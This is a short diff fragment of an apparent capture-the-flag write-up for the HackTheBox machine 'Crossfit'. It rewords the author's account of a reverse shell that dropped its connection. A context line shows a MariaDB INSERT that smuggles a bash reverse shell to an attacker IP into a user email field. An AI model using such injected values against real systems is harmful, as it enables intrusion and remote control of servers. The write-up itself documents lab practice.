zweilosec/htb-writeups/linux-machines/insane/crossfit.md

 isaac@crossfit:~$ exit
 ```

-I got a connection back from my injected code, however it also immediately ran two commands \(test and exit\) which caused it to disconnect...I could not get the same injected command to work later.
+I got a connection back from my injected code, however it also immediately ran two commands \( I did not type these: `test` and `exit`\) which caused it to disconnect...I could not get the same injected command to work later.
 I have not idea what is broken here

 ```text
 MariaDB [crossfit]> INSERT INTO users (id,email) VALUES (8081,"-E $(bash -c 'bash -i >& /dev/tcp/10.10.14.176/8081 0>&1')");